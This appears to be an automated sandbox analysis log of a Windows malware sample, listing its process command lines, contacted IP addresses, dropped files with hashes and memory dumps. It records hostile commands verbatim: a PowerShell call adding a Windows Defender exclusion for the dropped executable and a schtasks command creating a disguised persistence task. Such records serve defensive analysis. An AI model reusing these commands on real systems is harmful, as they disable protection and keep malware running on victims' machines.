C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8112.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| US | 8.8.8.8:53 | 136.243.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | tcp | |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp | |
| DE | 94.156.177.95:80 | tcp |
Files
memory/1748-0-0x0000000070BAE000-0x0000000070BAF000-memory.dmp
memory/1748-1-0x0000000005160000-0x0000000005196000-memory.dmp
memory/1748-2-0x0000000070BA0000-0x0000000071350000-memory.dmp
memory/1748-3-0x00000000057D0000-0x0000000005DF8000-memory.dmp
memory/1748-4-0x0000000005770000-0x0000000005792000-memory.dmp
memory/1748-5-0x0000000006070000-0x00000000060D6000-memory.dmp
memory/1748-6-0x00000000060E0000-0x0000000006146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04mdrev0.wjp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1748-16-0x0000000006150000-0x00000000064A4000-memory.dmp
memory/1748-17-0x0000000006710000-0x000000000672E000-memory.dmp
memory/1748-18-0x0000000006750000-0x000000000679C000-memory.dmp
memory/4404-28-0x0000000007210000-0x0000000007242000-memory.dmp
memory/4404-29-0x000000006D460000-0x000000006D4AC000-memory.dmp
memory/4404-39-0x00000000071D0000-0x00000000071EE000-memory.dmp
memory/4404-40-0x0000000007450000-0x00000000074F3000-memory.dmp
memory/4404-41-0x0000000007BD0000-0x000000000824A000-memory.dmp
memory/4404-42-0x0000000007590000-0x00000000075AA000-memory.dmp
memory/4404-43-0x00000000075F0000-0x00000000075FA000-memory.dmp
memory/4404-44-0x0000000007820000-0x00000000078B6000-memory.dmp
memory/4404-45-0x0000000007790000-0x00000000077A1000-memory.dmp
memory/4404-46-0x00000000077C0000-0x00000000077CE000-memory.dmp
memory/4404-47-0x00000000077D0000-0x00000000077E4000-memory.dmp
memory/4404-48-0x00000000078E0000-0x00000000078FA000-memory.dmp
memory/4404-49-0x0000000007810000-0x0000000007818000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.cmdline
| MD5 | b116759c3a46e55d009454c05ad48777 |
| SHA1 | d0dacaa7be3b4f6624273b67eb07972846a40bbb |
| SHA256 | 152987daf9e2b18c4f3f0ae6c2ec1ad1da0d76c5f11e1284590177cb3ae070c3 |
| SHA512 | 827de42016ef7fb04a29a4c2e5c0c0eff9df720eee1c7110443446ffc924b5b014e8056bdf4c8c782e938dd0aea7de2276c59e5f6c405d2fb4c3f765036b4bc4 |
\??\c:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.0.cs
| MD5 | f8419bbc398e1a2b134eec88b333f8f6 |
| SHA1 | 57ebba4cad00272da80b919df0908ec40f9be48a |
| SHA256 | 25fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3 |
| SHA512 | b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674 |
\??\c:\Users\Admin\AppData\Local\Temp\vpqxczhe\CSC633947E119804030A21172F9908F922A.TMP
| MD5 | e0f21690c648bc662c31d24c209c38f2 |
| SHA1 | 43a77c8a40fe2aeb7d12efa10930dda071d1dab0 |
| SHA256 | 6200a755a5c4cacfe465fb8d9bd7ee2d395c520bf8fc4fc6734106141ad277d9 |
| SHA512 | 86a2974107d7a62b41bffd1b80c809cf8055842583bd18aa10bbefa5fc23f170b48d35c94db84125bd3c8a8c42ada0b3fd91f47040bf3c7040eecdf591bcb7be |
C:\Users\Admin\AppData\Local\Temp\RESD38C.tmp
| MD5 | 98862bda729923e2cd289e2380666eaa |
| SHA1 | ccbb2681bfaaf2e1490995198654d20b2001a2aa |
| SHA256 | cb51b71bab2d3b398a6b40a46e18ea39dae544f52f31191baff0d96ad68768c0 |
| SHA512 | b6d3e39eb9bc54acec9f11da46947685b47a83bdc03be261cbf0403e692aca79b47e858c31dc26d081bcd5dba5902c77f7c688a3d01da25605f13b11b81a2a4e |
C:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.dll
| MD5 | 41b30848f411946b58a663f10fc0be62 |
| SHA1 | 3323e248929131c3e17b683dd8afd044f291d582 |
| SHA256 | 7ecd628bbea55d74e8efee1a282f312297c6dac2719790b9ce8b842b5d8035e7 |
| SHA512 | 0b5b882f7898f2adf0d06f279007c0968945652524537a495b8d1259ba152021f227069cba8c9da8cb419d2c2384ed4d9ff56fac6f85999b41304780514a0a6b |
memory/1748-64-0x0000000006CE0000-0x0000000006CE8000-memory.dmp
memory/1748-70-0x0000000070BAE000-0x0000000070BAF000-memory.dmp
memory/1748-71-0x0000000070BA0000-0x0000000071350000-memory.dmp
memory/1748-72-0x0000000070BA0000-0x0000000071350000-memory.dmp
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 318ff90d7a2797a041b836f7f8900f62 |
| SHA1 | fdda6afed7a1643ae353e7a635e6744c2b0a07d5 |
| SHA256 | 241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430 |
| SHA512 | 808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\pOwersheLl.eXe.log
| MD5 | 3d086a433708053f9bf9523e1d87a4e8 |
| SHA1 | b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28 |
| SHA256 | 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69 |
| SHA512 | 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | dcdb0a9f978252d8bd2cd5764bdc3780 |
| SHA1 | 262a1e66f72df7d2ddbcbca02bb6c6c2880e3fb7 |
| SHA256 | 6198da3e5fde7a9329829e6d334b8c915381bbc13637afbaa3ea5b4ef9bb3aca |
| SHA512 | 1a983ec785966fd21226a9ff380854f6d903d6f2b98dc70f99bd0eecb90be94c17a6ffcbc36802d2f59d18dd6d62ced83062a7313b3e9282c33b357e91b90742 |
memory/3440-81-0x00000000003C0000-0x0000000000454000-memory.dmp
memory/1748-82-0x0000000070BA0000-0x0000000071350000-memory.dmp
memory/3440-83-0x00000000052E0000-0x0000000005884000-memory.dmp
memory/3440-85-0x0000000004EE0000-0x0000000004F8A000-memory.dmp
memory/3440-84-0x0000000004D30000-0x0000000004DC2000-memory.dmp
memory/3440-86-0x00000000052A0000-0x00000000052AA000-memory.dmp
memory/3440-87-0x0000000005BB0000-0x0000000005C4C000-memory.dmp
memory/3440-88-0x0000000005D50000-0x0000000005D62000-memory.dmp
memory/3440-89-0x0000000006EF0000-0x0000000006F54000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmp8112.tmp
| MD5 | d109bf22c44ea7b4dbfc0454cc49b011 |
| SHA1 | 22404735770e6c90bced04a120eb545f988b1cec |
| SHA256 | 799a7ab0646451034317a499561adba7c8addc8c8e4030e5fa15fdac8a2ab02e |
| SHA512 | 8a7b0415a169ecb773e59ec6279fd04ecfb55b758e02ff04d3ff4631dab41e1534ebdfb179944946ce89222ff3baa979600e4f183527aaa6c4b6f4d881472cc8 |
memory/1660-95-0x0000000005490000-0x00000000057E4000-memory.dmp
memory/2760-105-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2760-108-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/1660-119-0x0000000005B90000-0x0000000005BDC000-memory.dmp
memory/1660-123-0x000000006E9E0000-0x000000006EA2C000-memory.dmp
memory/1660-133-0x0000000006D50000-0x0000000006DF3000-memory.dmp
memory/4880-134-0x000000006E9E0000-0x000000006EA2C000-memory.dmp
memory/1660-144-0x00000000070C0000-0x00000000070D1000-memory.dmp
memory/4880-145-0x0000000007E00000-0x0000000007E14000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 664d4b00639af97613d69a4f2bafdcc1 |
| SHA1 | b6f949b2acab60d5645c41697ffaf2aabe085019 |
| SHA256 | 3ea4e1d48d263fd70736c2d249b066761071050cfd5cd7905f4b2d4d12d12e83 |
| SHA512 | 351a4b96111e76822306f77f0115826f7c0f8978bd9b633fa02f2fe1d459575a4324c2bd073a6bc50765003e58a34b2f12fa03a1357ee6e7c692c057d202121f |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |